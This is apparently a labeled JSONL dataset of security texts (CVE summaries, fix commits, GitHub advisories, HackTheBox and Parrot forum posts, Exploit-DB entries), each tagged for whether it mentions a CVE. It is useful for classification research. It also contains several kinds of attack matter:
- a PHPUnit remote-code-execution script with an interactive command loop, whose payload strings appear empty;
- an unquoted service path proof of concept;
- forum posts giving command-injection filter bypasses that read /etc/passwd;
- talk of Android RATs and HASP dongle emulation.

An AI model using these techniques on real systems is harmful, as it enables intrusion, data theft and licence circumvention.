+{"id": "a23415014703800b4b03", "text": "Farial_Mahmod: Rafel Rat : Android Rat Written In Java!Kalilinuxtutorials I tried three of them actually I am in testing Fatrat which is litllebit long not updated. Ahmyth are good but have weak options and not all working. [Rafel Rat] It’s buggy, as well many otpions does now work. I found this one https://www.youtube.com/watch?v=OxzJfi8WOcU (EDIT YES it’s scam, don’t buy) Which have options like copy code from google auth but I think seller could be a scammer as I see his group on telegream has mark SCAM next to his name.", "source": "parrotsec", "timestamp": "2022-01-25", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "97c3eac62d690d37c51a", "text": "I finished this module today. It was brutal. It was very confusing, and I thank you all for helping me in one way or another. The comments by @akorexsecurity specifically enabled me to finish this module. John", "source": "hackthebox", "timestamp": "2022-12-07", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "1fc493d420d577ab7b80", "text": "CVE: CVE-2022-21711\n\n[{'lang': 'en', 'value': 'elfspirit is an ELF static analysis and injection framework that parses, manipulates, and camouflages ELF files. When analyzing the ELF file format in versions prior to 1.1, there is an out-of-bounds read bug, which can lead to application crashes or information leakage. By constructing a special format ELF file, the information of any address can be leaked. elfspirit version 1.1 contains a patch for this issue.'}]\n\nFix commit: Fix #1 about out-of-bounds", "source": "cvefixes", "timestamp": "2022-01-24", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "ff017988cd7e88bd510b", "text": "CVE: CVE-2022-37451\n\n[{'lang': 'en', 'value': 'Exim before 4.96 has an invalid free in pam_converse in auths/call_pam.c because store_free is not used after store_malloc.'}]\n\nFix commit: Fix PAM auth. Bug 2813", "source": "cvefixes", "timestamp": "2022-08-06", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "00e206cd69d5444a4363", "text": "Cross-site Scripting in Jenkins REST List Parameter Plugin\n\n[Severity: HIGH]\n\nJenkins REST List Parameter Plugin 1.5.2 and earlier does not escape the name and description of REST list parameters on views displaying parameters, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Item/Configure permission.\n\nExploitation of this vulnerability requires that parameters are listed on another page, like the \\\"Build With Parameters\\\" and \\\"Parameters\\\" pages provided by Jenkins (core), and that those pages are not hardened to prevent exploitation. Jenkins (core) has prevented exploitation of vulnerabilities of this kind on the \\\"Build With Parameters\\\" and \\\"Parameters\\\" pages since 2.44 and LTS 2.32.2 as part of the [SECURITY-353 / CVE-2017-2601](https://www.jenkins.io/security/advisory/2017-02-01/#persisted-cross-site-scripting-vulnerability-in-parameter-names-and-descriptions) fix. Additionally, several plugins have previously been updated to list parameters in a way that prevents exploitation by default, see [SECURITY-2617 in the 2022-04-12 security advisory for a list](https://www.jenkins.io/security/advisory/2022-04-12/#SECURITY-2617).", "source": "github_advisory", "timestamp": "2022-06-24", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "447bde114c7372d94d79", "text": "Any hints for flag4? Pulling my hair out with it at the moment and getting nowhere No matter…I have it…I was focusing too much on the one thing", "source": "hackthebox", "timestamp": "2022-01-14", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "28cc7ec5a487096839b7", "text": "Improper Authentication in Apache Axis2\n\n[Severity: MEDIUM]\n\nApache Axis2 allows remote attackers to forge messages and bypass authentication via a SAML assertion that lacks a Signature element, aka a \"Signature exclusion attack,\" a different vulnerability than CVE-2012-4418. ", "source": "github_advisory", "timestamp": "2022-05-13", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "c9be0555cada9f21c622", "text": "ChakraCore RCE Vulnerability\n\n[Severity: HIGH]\n\nA remote code execution vulnerability exists in the way that the ChakraCore scripting engine handles objects in memory, aka \"Scripting Engine Memory Corruption Vulnerability.\" This affects Microsoft Edge, ChakraCore. This CVE ID is unique from CVE-2018-8353, CVE-2018-8355, CVE-2018-8359, CVE-2018-8371, CVE-2018-8372, CVE-2018-8373, CVE-2018-8385, CVE-2018-8389.", "source": "github_advisory", "timestamp": "2022-05-13", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "72910330f706ab458582", "text": "CVE: CVE-2021-30070\n\n[{'lang': 'en', 'value': \"An issue was discovered in HestiaCP before v1.3.5. Attackers are able to arbitrarily install packages due to values taken from the pgk [] parameter in the update request being transmitted to the operating system's package manager.\"}]\n\nFix commit: Prevent install via CLI / API / WebGUI via command v-update-sys-hestia package \nCurrent script accepts all valid packages now limiited to hestia, hestia-nginx, hestia-php\n@numanturle", "source": "cvefixes", "timestamp": "2022-08-18", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "0a795b05f27ef7364619", "text": "Can you possibly help me too? I’ve been battling with this for days. So far I’ve discovered that all the operands except && are blocked (ie. ; | \\n) A sub shell is possible and ${PATH:0:1} works for /. However, LS_COLORS doesn’t exist so I can’t get a ; from that. I’ve tried 877915113.txt$(tr${IFS}‘!-}’${IFS}‘\"-~’<<<:) to try and get a ; - I don’t get a Malicious error, I just get “Error While Moving:” and no filename or anything further. Right now I’m just trying to execute the ls command, but I’m getting nowhere. I feel like there is something simple I’m missing?", "source": "hackthebox", "timestamp": "2022-11-05", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "f8f39f15357e9878de24", "text": "ChakraCore RCE Vulnerability\n\n[Severity: HIGH]\n\nChakraCore and Microsoft Edge in Windows 10 1511, 1607, 1703, 1709, and Windows Server 2016 allows an attacker to execute arbitrary code in the context of the current user, due to how the scripting engine handles objects in memory, aka \"Scripting Engine Memory Corruption Vulnerability\". This CVE ID is unique from CVE-2017-11886, CVE-2017-11889, CVE-2017-11890, CVE-2017-11893, CVE-2017-11894, CVE-2017-11895, CVE-2017-11901, CVE-2017-11903, CVE-2017-11907, CVE-2017-11908, CVE-2017-11909, CVE-2017-11910, CVE-2017-11911, CVE-2017-11912, CVE-2017-11913, CVE-2017-11914, CVE-2017-11916, CVE-2017-11918, and CVE-2017-11930.", "source": "github_advisory", "timestamp": "2022-05-14", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "ced7b7a6a92fd5d0c654", "text": "CVE: CVE-2021-40565\n\n[{'lang': 'en', 'value': 'A Segmentation fault caused by a null pointer dereference vulnerability exists in Gpac through 1.0.1 via the gf_avc_parse_nalu function in av_parsers.c when using mp4box, which causes a denial of service.'}]\n\nFix commit: fixed #1902", "source": "cvefixes", "timestamp": "2022-01-12", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "1e65f6f482189b40883d", "text": "CVE: CVE-2022-29369\n\n[{'lang': 'en', 'value': 'Nginx NJS v0.7.2 was discovered to contain a segmentation violation via njs_lvlhsh_bucket_find at njs_lvlhsh.c.'}]\n\nFix commit: Fixed njs_vmcode_interpreter() when \"toString\" conversion fails.\n\nPreviously, while interpreting a user function, njs_vmcode_interpreter()\nmight return prematurely when an error happens. This is not correct\nbecause the current frame has to be unwound (or exception caught)\nfirst.\n\nThe fix is exit through only 5 appropriate exit points to ensure\nproper unwinding.\n\nThis closes #467 issue on Github.", "source": "cvefixes", "timestamp": "2022-05-12", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "a52066f5cf3a60599372", "text": "Which kernel version is installed on the system? (Format: 1.22.3) Which kernel version is installed on the system? (Format: 1.22.3) I nedd help", "source": "hackthebox", "timestamp": "2022-11-23", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "738113ba1df2590d6a56", "text": "I`ve been stuck at this one for a while, I get many numbers but none are right…", "source": "hackthebox", "timestamp": "2023-02-25", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "739e63b2dd868fac5181", "text": "Throwing my tips here since I found a cheeky way of doing this flag using mostly what you get in lesson “Bypassing Other Blacklisted Characters”. Here’s the deal, the default move command is like mv src dest … Now, HTB’s hint says it’s easier to inject at the end rather than the middle. Actually if you do both you get a quick and easy way… Start like this: try to move the flag to /tmp , it won’t work but you will get a valuable error message. Now what would happen if you would run a command like: mv source /var/www/html/tmp$(head -n 1 /etc/passwd) ? You’d get the first line of /etc/passwd in the path itself. Try to adapt this to the assessment, it doesn’t require anything advanced, no base64 encoding or reversing… all you need to use is PATH, IFS and bypass a blacklisted command", "source": "hackthebox", "timestamp": "2023-11-10", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "af07abe0f5a4f86f3c0a", "text": "Has there been anyone able to solve that very last question and sucessfully finish that module?", "source": "hackthebox", "timestamp": "2022-02-18", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "8a7f9ddb51d833d60ade", "text": "CVE: CVE-2022-29211\n\n[{'lang': 'en', 'value': 'TensorFlow is an open source platform for machine learning. Prior to versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4, the implementation of `tf.histogram_fixed_width` is vulnerable to a crash when the values array contain `Not a Number` (`NaN`) elements. The implementation assumes that all floating point operations are defined and then converts a floating point result to an integer index. If `values` contains `NaN` then the result of the division is still `NaN` and the cast to `int32` would result in a crash. This only occurs on the CPU implementation. Versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4 contain a patch for this issue.'}]\n\nFix commit: Prevent crash when histogram is called with NaN values.\n\nFixes #45770\n\nPiperOrigin-RevId: 443149951", "source": "cvefixes", "timestamp": "2022-05-21", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "2b5f5bbc1559a29e1b95", "text": "CVE: CVE-2022-2301\n\n[{'lang': 'en', 'value': 'Buffer Over-read in GitHub repository hpjansson/chafa prior to 1.10.3.'}]\n\nFix commit: XwdLoader: Fix buffer over-read and improve general robustness\n\nThis commit fixes a buffer over-read that could occur due to g_ntohl()\nevaluating its argument more than once if at least one of the following\nis true:\n\n* Build target is not x86.\n* __OPTIMIZE__ is not set during compilation (e.g. -O0 was used).\n\nIt also improves robustness more generally and fixes an issue where the\nwrong field was being used to calculate the color map size, causing some\nimage files that were otherwise fine to be rejected.\n\nReported by @JieyongMa via huntr.dev.", "source": "cvefixes", "timestamp": "2022-07-04", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "00f77776d274d6f80835", "text": "PHP Unit 4.8.28 - Remote Code Execution (RCE) (Unauthenticated)\n\n# Exploit Title: PHP Unit 4.8.28 - Remote Code Execution (RCE) (Unauthenticated)\n# Date: 2022/01/30\n# Exploit Author: souzo\n# Vendor Homepage: phpunit.de\n# Version: 4.8.28\n# Tested on: Unit\n# CVE : CVE-2017-9841\n\nimport requests\nfrom sys import argv\nphpfiles = [\"/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\", \"/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\", \"/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\", \"/laravel52/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\", \"/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\", \"/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\"]\n\ndef check_vuln(site):\n vuln = False\n try:\n for i in phpfiles:\n site = site+i\n req = requests.get(site,headers= {\n \"Content-Type\" : \"text/html\",\n \"User-Agent\" : f\"Mozilla/5.0 (X11; Linux x86_64; rv:95.0) Gecko/20100101 Firefox/95.0\",\n },data=\"\")\n if \"6dd70f16549456495373a337e6708865\" in req.text:\n print(f\"Vulnerable: {site}\")\n return site\n except:\n return vuln\ndef help():\n exit(f\"{argv[0]} \")\n\ndef main():\n if len(argv) < 2:\n help()\n if not \"http\" in argv[1] or not \":\" in argv[1] or not \"/\" in argv[1]:\n help()\n site = argv[1]\n if site.endswith(\"/\"):\n site = list(site)\n site[len(site) -1 ] = ''\n site = ''.join(site)\n\n pathvuln = check_vuln(site)\n if pathvuln == False:\n exit(\"Not vuln\")\n try:\n while True:\n cmd = input(\"> \")\n req = requests.get(str(pathvuln),headers={\n \"User-Agent\" : f\"Mozilla/5.0 (X11; Linux x86_64; rv:95.0) Gecko/20100101 Firefox/95.0\",\n \"Content-Type\" : \"text/html\"\n },data=f'')\n print(req.text)\n except Exception as ex:\n exit(\"Error: \" + str(ex))\nmain()", "source": "exploitdb", "timestamp": "2022-02-02", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "9e7d10b7707844e8c7ad", "text": "Node Connect Reflected Cross-Site Scripting in Sencha Labs Connect middleware\n\n[Severity: MEDIUM]\n\nnode-connect before 2.8.2 has cross site scripting in Sencha Labs Connect middleware (vulnerability due to incomplete fix for CVE-2013-7370)\n\n### Overview\nConnect is a stack of middleware that is executed in order in each request.\n\nThe \"methodOverride\" middleware allows the http post to override the method of the request with the value of the \"_method\" post key or with the header \"x-http-method-override\".\n\nBecause the user post input was not checked, req.method could contain any kind of value. Because the req.method did not match any common method VERB, connect answered with a 404 page containing the \"Cannot `[method]` `[url]`\" content. The method was not properly encoded for output in the browser.\n\n\n### Example:\n```\n~ curl \"localhost:3000\" -d \"_method=\"\nCannot /\n```\n\n### Recommendation\n\nUpdate to the newest version of Connect or disable methodOverride. It is not possible to avoid the vulnerability if you have enabled this middleware in the top of your stack.\n\n### Credit:\nSergio Arcos", "source": "github_advisory", "timestamp": "2022-05-05", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "2dd25f8c36959c136669", "text": "Introduction to Windows Command Line - Skill Assessment nº9\n\nHi! I cannot pass question nº9 Use the tasklist command to print the started services and then sort them in reverse order by name. The fourth service is the flag for this user. I have tried the following with no luck: Get-Service | Sort-Object -Property Name -Descending Get-Service | Where status -like ‘Running’ | Sort-Object -Property Name -Descending Any tip?", "source": "hackthebox", "timestamp": "2022-12-28", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "9c1b477e129ad6d8c759", "text": "Off-topic: image 592×198 34.7 KB The actual result image 592×128 14.5 KB", "source": "parrotsec", "timestamp": "2022-03-10", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "8ca0cb336dcde83260ea", "text": "CVE: CVE-2022-26530\n\n[{'lang': 'en', 'value': 'swaylock before 1.6 allows attackers to trigger a crash and achieve unlocked access to a Wayland compositor.'}]\n\nFix commit: Add support for ext-session-lock-v1\n\nThis is a new protocol to lock the session [1]. It should be more\nreliable than layer-shell + input-inhibitor.\n\n[1]: https://gitlab.freedesktop.org/wayland/wayland-protocols/-/merge_requests/131", "source": "cvefixes", "timestamp": "2022-04-03", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "ae005e22cde85d21798e", "text": "Th3Director: Try sudo dnstool address 1.1.1.1 or 8.8.8.8 Or check the settings in your browser, mostly about proxy. Proxy settings are good, plugins off, still most website even does not open if I click in bookmark there is no any action after click.", "source": "parrotsec", "timestamp": "2022-02-08", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "fdded81e98f09557c69e", "text": "image 1267×843 227 KB having similar issue, its taking longer than the time laps given for the ip and port needing help for mking the passlist", "source": "hackthebox", "timestamp": "2023-04-06", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "168ad749e6419a88a45c", "text": "CVE: CVE-2022-24300\n\n[{'lang': 'en', 'value': 'Minetest before 5.4.0 allows attackers to add or modify arbitrary meta fields of the same item stack as saved user input, aka ItemStack meta injection.'}]\n\nFix commit: Sanitize ItemStack meta text", "source": "cvefixes", "timestamp": "2022-02-02", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "46043195e0d56ad69d32", "text": "Three walkthrough\n\nI followed the three writeup and still can’t reverse shell to capture flag. YT tutors didn’t help. What’s wrong with this one?", "source": "hackthebox", "timestamp": "2023-05-19", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "2a23a7d359f98afe6779", "text": "ChakraCore RCE Vulnerability\n\n[Severity: HIGH]\n\nThe Chakra JavaScript engine in Microsoft Edge allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka \"Scripting Engine Memory Corruption Vulnerability,\" a different vulnerability than CVE-2016-0186 and CVE-2016-0191.", "source": "github_advisory", "timestamp": "2022-05-14", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "247a2e352f1bbf4f2b7e", "text": "CVE: CVE-2022-0339\n\n[{'lang': 'en', 'value': 'Server-Side Request Forgery (SSRF) in Pypi calibreweb prior to 0.6.16.'}]\n\nFix commit: Kobo sync token is now also created if accessed from localhost(fixes #1990)\nCreate kobo sync token button is now \"unclicked\" after closing dialog\nAdditional localhost route is catched\nIf book format is deleted this also deletes the book synced to kobo status", "source": "cvefixes", "timestamp": "2022-01-30", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "c34132dc457314735a25", "text": "MiniTool Partition Wizard ShadowMaker v.12.7 - Unquoted Service Path _MTSchedulerService_\n\n# Exploit Title: MiniTool Partition Wizard ShadowMaker v.12.7 - Unquoted Service Path\n# Date: 06/07/2023\n# Exploit Author: Idan Malihi\n# Vendor Homepage: https://www.minitool.com/\n# Software Link: https://www.minitool.com/download-center/\n# Version: 12.7\n# Tested on: Microsoft Windows 10 Pro\n# CVE : CVE-2023-36165\n\n#PoC\n\nC:\\Users>wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v \"C:\\Windows\\\\\" | findstr /i /v \"\"\"\nMTSchedulerService MTSchedulerService C:\\Program Files (x86)\\MiniTool ShadowMaker\\SchedulerService.exe Auto\n\nC:\\Users>sc qc MTSchedulerService\n[SC] QueryServiceConfig SUCCESS\n\nSERVICE_NAME: MTSchedulerService\n TYPE : 110 WIN32_OWN_PROCESS (interactive)\n START_TYPE : 2 AUTO_START\n ERROR_CONTROL : 1 NORMAL\n BINARY_PATH_NAME : C:\\Program Files (x86)\\MiniTool ShadowMaker\\SchedulerService.exe\n LOAD_ORDER_GROUP :\n TAG : 0\n DISPLAY_NAME : MTSchedulerService\n DEPENDENCIES :\n SERVICE_START_NAME : LocalSystem\n\nC:\\Users>systeminfo\n\nHost Name: DESKTOP-LA7J17P\nOS Name: Microsoft Windows 10 Pro\nOS Version: 10.0.19042 N/A Build 19042\nOS Manufacturer: Microsoft Corporation", "source": "exploitdb", "timestamp": "2023-07-11", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "33878590874e674e0abb", "text": "Hasp hl emulation troubles\n\nHi, i have a hasp hl i have been trying to emulate. i have all emulation files needed drivers installed ect however when i try and dump i am recieving hasp not key found. (Photo attached) Cannot get my head around it really as i have all drivers ect the hasp is showing on the computer. I have attached a photo any help would be much appreciated Thankyou", "source": "go4expert", "timestamp": "2022-03-31", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "25f4cc4fb2b26fb09bbb", "text": "CVE: CVE-2022-29189\n\n[{'lang': 'en', 'value': 'Pion DTLS is a Go implementation of Datagram Transport Layer Security. Prior to version 2.1.4, a buffer that was used for inbound network traffic had no upper limit. Pion DTLS would buffer all network traffic from the remote user until the handshake completes or timed out. An attacker could exploit this to cause excessive memory usage. Version 2.1.4 contains a patch for this issue. There are currently no known workarounds available.'}]\n\nFix commit: Add limit to fragmentBuffer\n\nBefore we imposed no limit on the amount of data we would buffer during\nthe handshake. This changes adds a 2 megabyte. When the limit is\nexceeded the Conn returns an error.", "source": "cvefixes", "timestamp": "2022-05-21", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "b766e80320c142e77d30", "text": "Incorrect flag\n\nI have got user and root flag for one of the active machine but when i paste into submit flag field it shows me Error-incorrect flag. I have also watched videos on how to other people sumit the flag and i am replicating the same steps with the my flags still it gives me error. Can somebody help me on this?", "source": "hackthebox", "timestamp": "2023-03-26", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "722df1502c432145c39b", "text": "cherryeater: I will happy to help you without spoilering if you still needed. Can you give any more hints?", "source": "hackthebox", "timestamp": "2022-01-13", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "766d2a96af42037495ca", "text": "Talos vulnerable dependency due to race condition in Linux kernel's IP framework XFRM\n\n[Severity: HIGH]\n\n### Impact\nA race condition was found in the Linux kernel's IP framework for transforming packets (XFRM subsystem) when multiple calls to xfrm_probe_algs occurred simultaneously. This flaw could allow a local attacker to potentially trigger an out-of-bounds write or leak kernel heap memory by performing an out-of-bounds read and copying it into a socket.\n\n### Patches\nThe fix has been backported to [5.15.64](https://www.linuxkernelcves.com/cves/CVE-2022-3028) version of the upstream Linux kernel (5.15 is the upstream Kernel long term version Talos ships with). Talos >= v1.2.0 is shipped with Linux Kernel 5.15.64 fixing the above issue.\n\nKubernetes workloads running in Talos are not affected since user namespaces are disabled in Talos kernel config. So an unprivileged user cannot obtain CAP_NET_ADMIN by unsharing. However untrusted workloads that run with privileged: true or having NET_ADMIN capability poses a risk.\n\n### Workarounds\nAudit kubernetes workloads running in the cluster with privileged: true set or having NET_ADMIN capability and assess the threat vector.\n\n### References\n- https://nvd.nist.gov/vuln/detail/CVE-2022-3028\n- https://access.redhat.com/security/cve/CVE-2022-3028\n\n### For more information\n- Email us at [security@siderolabs.com](mailto:security@siderolabs.com)\n", "source": "github_advisory", "timestamp": "2022-09-16", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "acfebc3d2c33452831a3", "text": "Server-Side Request Forgery in calibreweb\n\n[Severity: CRITICAL]\n\ncalibreweb prior to version 0.6.17 is vulnerable to server-side request forgery (SSRF). This is due to an incomplete fix for [CVE-2022-0339](https://github.com/advisories/GHSA-4w8p-x6g8-fv64). The blacklist does not check for `0.0.0.0`, which would result in a payload of `0.0.0.0` resolving to `localhost`.", "source": "github_advisory", "timestamp": "2022-03-08", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "a8b4c83eea3dd7259b1c", "text": "May I suggest the following: I think the exercise with the nomachine setup could be greatly simplified by simply providing the pcap file. the setup with nomachine is really cumbersome, I get timeouts every couple of minutes and reconnecting takes another couple of minutes. Like this it is just a pain.", "source": "hackthebox", "timestamp": "2022-03-21", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "7d82a1bdd00db2a98c0f", "text": "Both Cybersecurity and Artificial Intelligence/Machine Learning are exciting fields with a lot of potential for the future. It really depends on your interests and career goals. If you’re interested in protecting computer systems and networks from cyber attacks, Cybersecurity and digital forensic might be a good fit for you. On the other hand, if you’re interested in developing cutting-edge technology and working on projects like self-driving cars or virtual assistans. AI and machine learning might be a better option.", "source": "hackersploit", "timestamp": "2023-06-20", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "53bc357e1d69a66c4a16", "text": "ChakraCore Remote code execution Vulnerability\n\n[Severity: HIGH]\n\nA remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge, aka \"Chakra Scripting Engine Memory Corruption Vulnerability.\" This affects Microsoft Edge, ChakraCore. This CVE ID is unique from CVE-2018-8583, CVE-2018-8617, CVE-2018-8618, CVE-2018-8629.", "source": "github_advisory", "timestamp": "2022-05-13", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "2f5b77a8f6e5f0c7dbf9", "text": "CVE: CVE-2022-1441\n\n[{'lang': 'en', 'value': 'MP4Box is a component of GPAC-2.0.0, which is a widely-used third-party package on RPM Fusion. When MP4Box tries to parse a MP4 file, it calls the function `diST_box_read()` to read from video. In this function, it allocates a buffer `str` with fixed length. However, content read from `bs` is controllable by user, so is the length, which causes a buffer overflow.'}]\n\nFix commit: fixed #2175", "source": "cvefixes", "timestamp": "2022-04-25", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "42a5c2d9417352f9cb42", "text": "wow! great. i would like to learn more about how you are controlling the drone via keyboard. its been almost 2 years i’ve stoped working on this.", "source": "hackthebox", "timestamp": "2023-11-26", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "2932605f2c069711d73d", "text": "CVE: CVE-2022-24953\n\n[{'lang': 'en', 'value': 'The Crypt_GPG extension before 1.6.7 for PHP does not prevent additional options in GPG calls, which presents a risk for certain environments and GPG versions.'}]\n\nFix commit: Insert the end-of-options marker before operation arguments.\n\nThis marker stops the parsing of additional options during external\ncalls to GPG. This behavior is unintended but its security impact is\ndependent on the environment and the GPG version in use.", "source": "cvefixes", "timestamp": "2022-02-17", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "092874f0bcdf69f7cf3a", "text": "Wow this was difficult. I finally got the flag. It was a lot more simple than I thought. I heard others get the flag with different methods but my method was relatively simple. 1.Find where to inject, intercept move request with burp. 2.Look for \" malicious request denied! message in response, that means you are injecting in the correct request . 3. Look for “ error ” in responses, they give valuable info about what is happening when you inject stuff. 4.It is possible to read the flag without uploading flag.txt to /tmp directory or anywhere else, you can read it straight from the Response message in burp repeater. 5.It is not necessary to use sub shells, encoding, reversing words or using case manipulation. 6.I personally injected after from=filename.txt HERE 7.The only techniques I used were “ bypassing blacklisted commands ” , “ bypassing blacklisted characters ” and “ bypassing space filters ”. I solved this challenge with information only from these three modules. 8.I looked and monitored error messages in responses which ultimately led to my success, I was failing because the injection parameter I was using worked only if the first command succeeded, I realized from response that the first command failed “Error while moving: mv: cannot stat 'var/www/html/files/2143214.txt : No such file or directory” and changed my injection parameter(from “Detection” lesson) and immediately was successful. Hope this helped. I spent 4 hours on this and did not stand up from the computer once Good luck!", "source": "hackthebox", "timestamp": "2023-11-07", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "c6fea1c5e760b32cd527", "text": "Hello this is Palak Sharma Well, this topic is too much old but still can be helpful for many peoples. Well, anyone can follow these steps if he is looking to learn about web development. 1. Choose a programming language 2. Read books and tutorials 3. Practice 4. Join online communities 5. Take online courses The above practices will help you to do so. Thanks", "source": "go4expert", "timestamp": "2023-02-09", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "0ea9e2f59a79c4961938", "text": "Withdrawn Advisory: OS Command Injection in effect\n\n[Severity: CRITICAL]\n\n## Withdrawn Advisory\nThis advisory has been withdrawn because the [npm package effect](https://www.npmjs.com/package/effect), for which alerts were issued, does not correspond with https://github.com/Javascipt/effect, the repository with the vulnerable code. https://github.com/Javascipt/effect is not in any [supported ecosystem](https://docs.github.com/en/code-security/security-advisories/working-with-global-security-advisories-from-the-github-advisory-database/about-the-github-advisory-database#github-reviewed-advisories).\n\nAdditionally, the CVE Numbering Authority that issued the CVE for CVE-2020-7624 has updated [their advisory](https://snyk.io/vuln/SNYK-JS-EFFECT-564256) stating that \"This was deemed not a vulnerability.\"\n\n## Original Description\neffect through 1.0.4 is vulnerable to Command Injection. It allows execution of arbitrary command via the options argument.", "source": "github_advisory", "timestamp": "2022-02-10", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "52fa4b9fa813b4f8fab2", "text": "CVE: CVE-2022-0726\n\n[{'lang': 'en', 'value': 'Improper Authorization in GitHub repository chocobozzz/peertube prior to 4.1.0.'}]\n\nFix commit: Check video privacy when creating comments/rates", "source": "cvefixes", "timestamp": "2022-02-23", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "0b0cf9e1151f5413b319", "text": "Thanks so much for the help @chappyroo . This is essential for step 5 - some of these tasks are awful!", "source": "hackthebox", "timestamp": "2022-10-31", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "1c68f4a17e9fa34e0b20", "text": "CVE: CVE-2022-0772\n\n[{'lang': 'en', 'value': 'Cross-site Scripting (XSS) - Stored in GitHub repository librenms/librenms prior to 22.2.2.'}]\n\nFix commit: Resolved XSS issue from alert rule list modal (#13805)", "source": "cvefixes", "timestamp": "2022-02-27", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "7f7a233ea11bc8fde571", "text": "CVE: CVE-2021-23555\n\n[{'lang': 'en', 'value': 'The package vm2 before 3.9.6 are vulnerable to Sandbox Bypass via direct access to host error objects generated by node internals during generation of a stacktraces, which can lead to execution of arbitrary code on the host machine.'}]\n\nFix commit: Merge pull request #395 from XmiliaH/security-fixes\n\nInternal restructuring and security improvements", "source": "cvefixes", "timestamp": "2022-02-11", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "f1695af4993cd918b518", "text": "@james.clare Look at your --dnsserver argument and think about what it’s doing. Is that the IP you should be querying? Google that IP address and learn about what it is. Then think about where your queries should be going.", "source": "hackthebox", "timestamp": "2023-03-31", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "a4e6ddbc5b6f6699eb6a", "text": "CVE: CVE-2022-0443\n\n[{'lang': 'en', 'value': 'Use After Free in GitHub repository vim/vim prior to 8.2.'}]\n\nFix commit: patch 8.2.4281: using freed memory with :lopen and :bwipe\n\nProblem: Using freed memory with :lopen and :bwipe.\nSolution: Do not use a wiped out buffer.", "source": "cvefixes", "timestamp": "2022-02-02", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "d770dffe186fb5bdf49c", "text": "Best Wifi Adapter for Linux\n\nHello, can anyone guide which wifi adapter is good for pentesting which supports packet injection like stuff etc, or which one you are using right now?? Came across TP-Link TL-WN722N ! Any thoughts?? Thank You in advance!!", "source": "parrotsec", "timestamp": "2022-12-04", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "a8263218fab4cb059e55", "text": "Well it appears I over complicated this by 1000 times. At least I learned how to process data and modify scripts lol.", "source": "hackthebox", "timestamp": "2022-07-04", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "300443cc9bde7a0c5a94", "text": "I finally figured it out! Shoutout to olliz0r from the Discord community for the hint!", "source": "hackthebox", "timestamp": "2023-10-15", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
